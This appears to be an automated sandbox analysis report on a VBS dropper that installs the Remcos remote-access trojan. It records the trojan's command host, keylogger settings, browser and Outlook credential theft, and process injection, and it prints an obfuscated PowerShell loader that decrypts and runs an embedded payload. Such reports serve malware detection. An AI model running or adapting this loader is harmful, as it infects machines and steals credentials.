Analysis
-
max time kernel
148s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
27-07-2024 01:27
Static task
static1
Behavioral task
behavioral1
Sample
63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29.vbs
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29.vbs
Resource
win10v2004-20240704-en
General
-
Target
63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29.vbs
-
Size
404KB
-
MD5
91143de27aed4b3ae7741994bc065faa
-
SHA1
85dfa644d5397b58383c94a4a898484a7fa5b8ce
-
SHA256
63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29
-
SHA512
e8cadd0faab189cf64253d2d7eaea5485224db55958a842917696f418e8f1d18349ed8f6f6bf1bc916d646e3baaa7e50c06f86094e30f30c619f3975473d22b2
-
SSDEEP
3072:3HGOwf9YFlhNe4VTdRnTT8w4TWlrqivBgoWpuV3d/S7GpqrsomlkjiveR4nV:Zwf9YFJrqA
Malware Config
Extracted
remcos
RemoteHost
maveing.duckdns.org:18576
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
Notepo
-
keylog_path
%Temp%
-
mouse_option
false
-
mutex
Rmc-F4JFYD
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
Processes:
resource yara_rule behavioral2/memory/2188-44-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/1896-40-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/3036-41-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/3036-41-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/2188-44-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 4452 powershell.exe 27 4452 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation WScript.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts RegAsm.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process target process PID 4452 set thread context of 1132 4452 powershell.exe RegAsm.exe PID 1132 set thread context of 2188 1132 RegAsm.exe RegAsm.exe PID 1132 set thread context of 3036 1132 RegAsm.exe RegAsm.exe PID 1132 set thread context of 1896 1132 RegAsm.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
RegAsm.exeRegAsm.exeRegAsm.exeRegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exeRegAsm.exeRegAsm.exepid process 4452 powershell.exe 4452 powershell.exe 1896 RegAsm.exe 1896 RegAsm.exe 2188 RegAsm.exe 2188 RegAsm.exe 2188 RegAsm.exe 2188 RegAsm.exe -
Suspicious behavior: MapViewOfSection 7 IoCs
Processes:
RegAsm.exepid process 1132 RegAsm.exe 1132 RegAsm.exe 1132 RegAsm.exe 1132 RegAsm.exe 1132 RegAsm.exe 1132 RegAsm.exe 1132 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 1896 RegAsm.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
RegAsm.exepid process 1132 RegAsm.exe -
Suspicious use of WriteProcessMemory 38 IoCs
Processes:
WScript.exepowershell.exeRegAsm.exedescription pid process target process PID 848 wrote to memory of 4452 848 WScript.exe powershell.exe PID 848 wrote to memory of 4452 848 WScript.exe powershell.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 4452 wrote to memory of 1132 4452 powershell.exe RegAsm.exe PID 1132 wrote to memory of 2188 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2188 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2188 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2188 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2400 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2400 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2400 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 3036 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 3036 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 3036 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 3036 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 812 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 812 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 812 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 4668 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 4668 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 4668 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2252 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2252 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 2252 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 1896 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 1896 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 1896 1132 RegAsm.exe RegAsm.exe PID 1132 wrote to memory of 1896 1132 RegAsm.exe RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\63062215f38fde4985340ec9f4fb8746320d830be8e0c534ab3fbae7d3e89f29.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI16942742004897547110020442916503CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIAiyJ4w4PDxrjYBTpE+kCMXAi0n0WFrEwTQqO6Ll9vCemso5/Wu4WU8DFicwqoQGgHUNsDgf18ada181Zl+9aIMRyGbBhOQL1xtRLUPEYoMibGKdW5HX/pyEQS0Jw3Vh2+CYHtXZW4mAXpPVkuI6gUlIz8DEsOP8YwWP+kL3LpnXUvoD/qBKfflwTqLdaSslAUZJBizi2g2Z8nGQwpbShstgk8iXwe1n31tDVYVkp3T5T5WY1HmUD74K+YmOudrHG5Myz3duSqcna3IjfjlEbg/ZIO/KCvQGjgfJjV8ugk/Yy2P5Oa+5QFOgc8iixUoiNIoPAYztidKVOOGmbgFMbkku0XGVqmJjKcyMtEJtArogT9aYZx/ed96FLgWK+okfu0GPY3zgarb0LJ0UOULymAYnqJJj3ofVS7De8JjcTEqBknfr/caOlBiLhsYNQWSOgsDhrRvf5YYzMpM83vqh06V2szJv2yAB9LsAHIGxJWtU+c0ovHZ5Vdqtl/xa+xpgCscC3s+9s4OttMJQD+Y6OgggjtZYrP3PNltGTuGXGV6FdDehpSU/xdy/8GAxcGUjH9Mr8gb130Pu+0YBW9HdBQ2iWvdVhvMv9Qexc/zgzM2wKPrSh6KwTAbvQCmsP7v0n0diE/lfStsBI95daYr1R09j361KgVwHJfGtSYJKTiZxk3Kjr8ned9cTP7Hr1sIs66dD0GkNgVgIBM3hQi4l/JbuLztLdOqUSCMtPOJbMVvd+MpGtoXPGCTnJjImLTYVVP67C5k3Tf8ib1O6pKQeQcxhQ5hyr1qq3EQ0hJl5ZNCjy/SUT8QdLtfUcum3xRlxAeH032MIpclIzJhwFgmOsJsKiJLds99V3vTPgCXZZnxnNS2du/73NT4UYFNd4J7+I54BTGng1g4J6A5nhvO9KkoFS0c0denf7crIdeMf7pSj0inJztc2aRCT3AEJT3zVJwCBYKOYKPppt5njp0JLB5aB1OBZOO8YTYn1Zek16QtXF/UDhcFSHjS/B3tfXkD2tRnhujolV+Fes7ISTg3tPOFFvRigpQFL4IgLPiP2k7alWxEZHAX+W9FTNKh054AIMuEYzSP0JTVG2VJBq1OAfoQjhBvwQGKAAzRNd+6L+lgQp6ASIjm8tteW0NYUDIsW5x5Js0LElEjrFSiSmbujrdPEw/2oL5TaVIPCWAWwofdzk+coQ0nI1BV4Ecz4/ITbC8RsV1s7k18zvJwByHMIMM9IrxaprgzKSCaODhTKxF53rNwycY7cipt+8OD/N5OYtYZcvj7SdQKqL5DqbVs23F23QxJW9fAyZGdFz8Roqgg9TRDb2FyYfFHPkwCgRN8f9lD4F+Xjt70yId/tbDb3DUwEzhVgMNSBmOaW6o9DawkzEHDJcdtOzPNSKtye26n8CIG+NRXD0lhN5RBg3MLzMew==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4452 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rseixvnezz"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2188 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\cnjsxoyxnhdet"4⤵PID:2400
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\cnjsxoyxnhdet"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:3036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpwlyyjzbpvivlqs"4⤵PID:812
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpwlyyjzbpvivlqs"4⤵PID:4668
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpwlyyjzbpvivlqs"4⤵PID:2252
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\mpwlyyjzbpvivlqs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5dad68c4d79acbaf82afde7d2fc5744f7
SHA1dafccb784d184675fa68589214dab9e45739efcc
SHA256183e07ee2fbee4ac19ba294268c45a3c48b25a33eb9c63ad25f8a3941670fd1f
SHA512dbbe45c478a7ca787fa65e8fb424d26d2f6105294e13897a4288c3a497a6d722ca9791c3fb40cb84284fe32ba63b49cb2dac68c98e57f0b3c019a9828d6b219b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5f5c7d652e408753fba07ef2069ab8a13
SHA19815cd1ae93306cdacabf573ad54f1ef970b3913
SHA2566734744077bca26577abb89d0b811bef713c2a97e7fcc70888d4990d500fa67a
SHA51243570265f839d5e435c83052501c24ed182bda5a3a9db0f6eb519c251af85dafa10825a3995c66e1e88a7bcbcf9c7dcbbd2f24d661c05b7f20f5aa35f536bc80